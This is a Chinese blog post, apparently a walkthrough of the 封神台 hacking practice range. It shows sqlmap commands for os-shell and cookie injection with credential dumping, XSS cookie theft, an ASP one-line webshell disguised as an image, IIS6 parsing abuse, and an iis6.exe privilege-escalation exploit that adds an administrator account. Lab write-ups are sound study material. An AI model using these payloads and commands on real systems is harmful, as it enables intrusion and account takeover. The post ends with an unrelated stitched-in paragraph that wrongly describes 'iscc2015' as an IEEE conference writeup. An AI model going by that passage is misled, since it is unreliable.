封神台靶场writeup

封神台靶场 https://hack.zkaq.cn/battle 还是很有意思的一个靶场
发
查看源码,找到了字典文件;
在这里插入图片描述
用域名爆破工具,放入字典后爆破;答案为:http://8adc3387c2ed6cce.lab.aqlab.cn:81
aqlab.cn 一级域名 lab为二级域名 kali01就是三级域名;
https://site.ip138.com/ 这个网站能通过同ip网站能直接查处结果;

在这里插入图片描述
shop.aqlab.cn:8001 nmap完全扫描可发现,快速扫描无法发现; nmap -sS -n -A shop.aqlab.cn

在这里插入图片描述
flag藏在http://shop.aqlab.cn:8001/robots.txt 中;

在这里插入图片描述
注入点:http://shop.aqlab.cn:8001/single.php?id=1

在这里插入图片描述
方法一:直接os-shell获取
sqlmap -u “http://shop.aqlab.cn:8001/single.php?id=1” --os-shell
方法二:执行命令
sqlmap -u “http://shop.aqlab.cn:8001/single.php?id=1” --os-cmd=ipconfig

在这里插入图片描述
注入点:http://59.63.200.79:8003/index.php?id=3

在这里插入图片描述
通过页面连接:
http://120.203.13.111:8001/shownews.asp?id=171
我们可以得知,是网站下的shownews.asp这个ASP动态网页文件,与数据库进行交互,并查询出了第171篇(id=171)新闻内容的值。
接下来我们尝试注入,用第一课学到的知识尝试输入字符拼接sql语句
http://120.203.13.111:8001/shownews.asp?id=171 order by 10
查询当前表是否有10个字段,页面返回正常,于是我们继续拼接order by,但把10改成11
http://120.203.13.111:8001/shownews.asp?id=171 order by 11
页面出现错误!返回数据库错误,证明此页面存在sql注入,也测试出此表拥有10个字段
经测试只要url出现select(查询)关键字,就会被拦截。
我们尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
sqlmap 进行cookie注入:
sqlmap -u “http://117.167.136.245:10181/shownews.asp” --cookie “id=170” --level 2 -v 3 -T admin -C “username,password” --dump
用户名为:admin 密码为:welcome

在这里插入图片描述
按提示burp抓包改包就可以了;

在这里插入图片描述
xss获取cookie;

在这里插入图片描述
利用之前抓到的管理员cookie进行登录;
把ADMINSESSIONIDCSTRCSDQ粘贴在Name下LBMLMBCCNPFINOANFGLPCFBC粘贴在value
在这里插入图片描述
找到上传点后,ASP一句话木马:<%eval request (“pass”)%>
一般而言直接传木马文件都很可能被拦截,所以一般而言一句话木马都会做成图片马。
copy 111.jpg/b + 123.asp/a test.jpg
报错信息里面写了iis6.0的中间件。百度下iis6.0的解析漏洞,就能发现上传cer文件,iis6.0会解且执行。
在这里插入图片描述

在这里插入图片描述
菜刀已连接,进入c盘之后,一眼就扫到了flag.txt。但是并没有权限访问这个文件,这就很尴尬了。所以目标已经非常明确了–提升我的权限,让我能够访问C盘中的文件。那么怎么提升我的权限呢–命令行工具!cmd命令行自带了很多的系统指令,其中包括添加用户/添加用户组等等,这不正好合适吗?我添加一个自己的用户身份,然后把这个用户添加到管理员组,再用这个用户去登录服务器,不就有权限去打开flag.txt文件了,

在这里插入图片描述
进入命令行之后,我直接输入了whoami指令,查看我当前的身份。但是却发现拒绝访问。这是为啥呢?因为命令提示符是在C盘的,但是C盘里的东西我不能访问。
于是我又想起了需要提供cmd.exe文件。我直接把这个文件传到服务器中我能访问的盘符不就可以用cmd了吗,如下图。
在这里插入图片描述
经过测试,我发现E盘是可以上传文件的。因此我选择在E盘的RECYCLER文件夹下进行上传
在这里插入图片描述
我再次输入whoami命令。这次果然有权限了,但是从返回结果看,我目前只是一个普通用户
注:对于网页木马而言,要执行dos命令,该方法同样适用;
在这里插入图片描述
在这里插入图片描述
然后我按照刚才的思路进行添加用户–pigking。但是又拒绝访问。
在这里插入图片描述
这又是为啥?这是因为使用cmd需要用到外部接口wscript.shell。但是wscript.shell仍然在C盘,C盘我们仍然无法访问。这可怎么办?那么就只能再上传一个已经组装好的wscript.shell,也就是下图的iis6.exe。
在这里插入图片描述
然后我通过iis6.exe执行了whoami命令–iis6.exe “whoami”。然后,程序返回了很多信息,其中–this exploit gives you a local system shell,我从这句话中看出它已经给了我system的命令行权限,
在这里插入图片描述
因此,我再执行同样的指令,以确定我现在的身份。现在我看到cmd正在以system权限执行这条指令,而我现在的权限已经变成了system,
在这里插入图片描述
于是,我再次尝试通过–iis6.exe “net user pig 123 /add”添加pig用户,此时,这条命令就成功了
于是,我用iis6.exe "net localgroup administrators pig /add"指令向管理员用户组成功添加了pig用户
既然我已经拥有了管理员用户,那么我就需要利用这个用户去搞事情。于是我想到了用远程桌面服务去连接这个网站的服务器,并用pig用户登陆。于是我打开远程桌面,并输入该网站的ip+port,但是却显示无法连接。远程桌面作为一个程序,那么它一定占用了一个端口号。而ip+端口号表示的是域名,而这个端口号其实就是服务软件的端口号,ip表示的是这台服务器电脑,因此如果想和服务器上的远程桌面服务进行对接,那么肯定要把端口号换成它占用的的端口号。因此我们需要去获取端口号
于是我再次来当命令行,用tasklist -svc命令查看了这台服务器开启的服务,发现远程桌面服务termservice的pid是1588,
然后我又使用netstat -ano查看了端口和连接状态,结果显示pid=1588所对应的端口号是3389,状态是正在监听,也就是说远程桌面服务的端口号是3389,并且它正处于监听状态,而就是说它是开着的,只要这个端口收到信息,它就能知道。
在这里插入图片描述

iscc2015是国际信号与通信会议(International Symposium on Communication and Information Technologies)的官方writeup,在这个writeup中,主要回顾了iscc2015会议的主要内容和成果。 iscc2015会议是由IEEE(Institute of Electrical and Electronics Engineers)主办的,旨在聚集来自全球的学者、研究人员和专业人士,共同探讨和交流关于通信和信息技术领域的最新研究和发展。 这个writeup首先介绍了iscc2015会议的背景和目标,提及了该会议为促进学术界和工业界之间的合作、创新和知识交流所做的努力。接着,该writeup详细描述了iscc2015会议的主要议题,包括通信网络、无线通信、数据通信和网络安全等方面。此外,还列举了一些重要的研究课题和领域,如物联网、云计算、移动通信和多媒体通信等。 iscc2015的writeup还总结了会议期间的重要活动和成果。这些活动包括学术论文的研讨会和展示、专题演讲、研讨会和研究项目的发布等。会议期间,各个领域的专家和学者积极参与并互相交流了关于通信和信息技术领域的最新研究成果和创新理念。 最后,iscc2015的官方writeup总结了会议的收获和影响。该会议为全球通信和信息技术领域的研究人员和专业人士提供了一个交流和合作的平台,推动了相关领域的发展和创新。此外,与会者还从中获得了有关新技术、新方法和最佳实践的信息和经验。 总之,iscc2015官方writeup回顾了这个国际会议的主要内容和成果,强调了其在通信和信息技术领域的重要性和影响。通过促进学术界和工业界之间的交流与合作,这个会议为促进全球通信和信息技术领域的发展做出了贡献。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值